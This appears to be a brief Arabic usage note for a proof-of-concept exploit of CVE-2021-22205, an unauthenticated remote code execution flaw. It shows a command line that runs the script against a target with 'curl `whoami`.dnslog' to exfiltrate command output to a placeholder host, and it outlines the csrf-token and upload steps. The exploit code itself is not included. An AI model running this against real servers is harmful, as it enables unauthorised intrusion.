
CVE-2021-22205 RCE غير مصرح به
الإصدارات المتأثرة:
الاستخدام
python3 CVE-2021-22205.py target "curl \`whoami\`.dnslog"

الحصول على csrf-token:

احصل على csrf-token من خلال /users/sign_in ثم استخدم CVE-2021-22205 poc السابق لإنشاء حزمة تحميل لتنفيذ طلب تحميل غير مصادق عليه، مما يؤدي إلى RCE


المراجع: